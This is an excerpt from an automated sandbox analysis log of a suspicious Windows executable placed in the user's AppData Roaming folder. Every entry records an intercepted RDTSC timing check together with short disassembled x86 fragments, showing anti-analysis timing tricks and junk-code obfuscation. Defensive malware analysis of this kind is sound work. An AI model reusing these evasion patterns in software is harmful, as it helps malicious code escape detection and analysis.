Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C381C second address: 4C3820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C3ACA second address: 4C3AE7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2738B89E0Dh 0x0000000f jns 00007F2738B89E06h 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C3DDF second address: 4C3DE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C3DE3 second address: 4C3E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F2738B89E1Fh 0x0000000e jmp 00007F2738B89E13h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C3E06 second address: 4C3E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C3E0E second address: 4C3E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C3E12 second address: 4C3E22 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2738E98EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 47CC13 second address: 47CC19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 47CC19 second address: 47CC1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 47CC1D second address: 47CC25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C74EF second address: 4C7502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F2738E98EE6h 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C7502 second address: 4C7508 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C7508 second address: 4C7535 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F2738E98EF6h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push edx 0x00000014 jbe 00007F2738E98EECh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C7AFE second address: 4C7B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2738B89E18h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C7CF4 second address: 4C7CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C7CF8 second address: 4C7D13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C8164 second address: 4C8168 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C8168 second address: 4C816E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C816E second address: 4C8175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C8175 second address: 4C8189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebx 0x00000008 cld 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F2738B89E0Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C8189 second address: 4C818D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C860C second address: 4C8620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C8620 second address: 4C8625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C8764 second address: 4C876E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C876E second address: 4C8772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C95BD second address: 4C95C2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C95C2 second address: 4C961D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a sbb si, EBF7h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F2738E98EE8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d or si, 4645h 0x00000032 xchg eax, ebx 0x00000033 js 00007F2738E98EF2h 0x00000039 jmp 00007F2738E98EECh 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push esi 0x00000042 jno 00007F2738E98EE6h 0x00000048 pop esi 0x00000049 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C961D second address: 4C9623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4CA7DF second address: 4CA82A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F2738E98EEAh 0x0000000f push 00000000h 0x00000011 pushad 0x00000012 mov ch, C4h 0x00000014 mov eax, 71DBBF09h 0x00000019 popad 0x0000001a push 00000000h 0x0000001c jo 00007F2738E98EF6h 0x00000022 jmp 00007F2738E98EF0h 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d push esi 0x0000002e pop esi 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4CA82A second address: 4CA830 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4CA830 second address: 4CA834 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4CDD38 second address: 4CDD3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4CDD3D second address: 4CDD54 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2738E98EECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4CDD54 second address: 4CDD58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4CDD58 second address: 4CDD5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4CDD5E second address: 4CDD75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2738B89E13h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4CDD75 second address: 4CDDEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 add dword ptr [ebp+12485B1Eh], esi 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F2738E98EE8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007F2738E98EE8h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 00000016h 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 adc si, B233h 0x0000004c or dword ptr [ebp+122D25E8h], edi 0x00000052 mov dword ptr [ebp+122D1F0Ch], esi 0x00000058 xchg eax, ebx 0x00000059 jp 00007F2738E98EF0h 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 push esi 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4CDDEE second address: 4CDDF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 48A597 second address: 48A59D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 48A59D second address: 48A5C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E16h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jo 00007F2738B89E06h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 48A5C2 second address: 48A5D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2738E98EE6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 48A5D2 second address: 48A5D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4D0DBB second address: 4D0DD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F2738E98EE6h 0x00000009 js 00007F2738E98EE6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4D0DD2 second address: 4D0DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4D12DE second address: 4D12F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2738E98EF3h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4D12F5 second address: 4D1371 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F2738B89E08h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 or ebx, 7D378B95h 0x00000029 xor bh, FFFFFFF9h 0x0000002c sub dword ptr [ebp+122D2B12h], esi 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007F2738B89E08h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 0000001Bh 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e jmp 00007F2738B89E11h 0x00000053 mov bx, 2624h 0x00000057 push 00000000h 0x00000059 sub dword ptr [ebp+1247FBC5h], esi 0x0000005f xchg eax, esi 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 popad 0x00000065 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4D2442 second address: 4D2469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F2738E98EF9h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4D2469 second address: 4D24E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 js 00007F2738B89E06h 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 mov di, bx 0x00000014 mov bl, 88h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007F2738B89E08h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 push 00000000h 0x00000034 mov ebx, dword ptr [ebp+122D386Bh] 0x0000003a xchg eax, esi 0x0000003b je 00007F2738B89E1Ch 0x00000041 js 00007F2738B89E16h 0x00000047 jmp 00007F2738B89E10h 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F2738B89E13h 0x00000055 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4D3428 second address: 4D342C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4D342C second address: 4D3430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4D3430 second address: 4D344C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2738E98EF4h 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4D344C second address: 4D3488 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c mov ebx, edx 0x0000000e push 00000000h 0x00000010 mov edi, ecx 0x00000012 xchg eax, esi 0x00000013 push eax 0x00000014 jmp 00007F2738B89E18h 0x00000019 pop eax 0x0000001a push eax 0x0000001b jnp 00007F2738B89E14h 0x00000021 push eax 0x00000022 push edx 0x00000023 jo 00007F2738B89E06h 0x00000029 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4CBA71 second address: 4CBA87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a jns 00007F2738E98EE8h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4CBA87 second address: 4CBA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4D7431 second address: 4D7435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4D7435 second address: 4D7495 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a ja 00007F2738B89E0Ch 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F2738B89E08h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c sub dword ptr [ebp+12454FE7h], edi 0x00000032 mov edi, dword ptr [ebp+122D57E4h] 0x00000038 push 00000000h 0x0000003a jo 00007F2738B89E0Ch 0x00000040 mov ebx, dword ptr [ebp+122D3793h] 0x00000046 xchg eax, esi 0x00000047 push eax 0x00000048 push edx 0x00000049 jnc 00007F2738B89E0Ch 0x0000004f rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4CDAD2 second address: 4CDAD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4DC3E4 second address: 4DC3EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4DC3EA second address: 4DC3EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4DC3EE second address: 4DC463 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jbe 00007F2738B89E1Ah 0x00000012 push ebx 0x00000013 jmp 00007F2738B89E12h 0x00000018 pop ebx 0x00000019 nop 0x0000001a or dword ptr [ebp+122D2B18h], eax 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push eax 0x00000025 call 00007F2738B89E08h 0x0000002a pop eax 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f add dword ptr [esp+04h], 0000001Dh 0x00000037 inc eax 0x00000038 push eax 0x00000039 ret 0x0000003a pop eax 0x0000003b ret 0x0000003c mov dword ptr [ebp+122D2581h], ecx 0x00000042 adc bx, E086h 0x00000047 push 00000000h 0x00000049 mov bl, 10h 0x0000004b push eax 0x0000004c push ecx 0x0000004d push eax 0x0000004e push edx 0x0000004f push ecx 0x00000050 pop ecx 0x00000051 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4DE283 second address: 4DE2A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push esi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4DE2A8 second address: 4DE31B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F2738B89E08h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 sub dword ptr [ebp+122D3407h], edx 0x0000002b pop edi 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007F2738B89E08h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 or edi, dword ptr [ebp+12482EE8h] 0x0000004e xchg eax, esi 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F2738B89E12h 0x00000058 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4DE31B second address: 4DE321 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4DE321 second address: 4DE326 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4DE326 second address: 4DE344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2738E98EF2h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4DE344 second address: 4DE34E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2738B89E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4CE5FA second address: 4CE5FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4CE5FE second address: 4CE604 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4D264B second address: 4D264F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4D264F second address: 4D2655 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4D6639 second address: 4D664B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2738E98EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4D855D second address: 4D8571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2738B89E0Dh 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4DC576 second address: 4DC57C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4DC57C second address: 4DC580 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
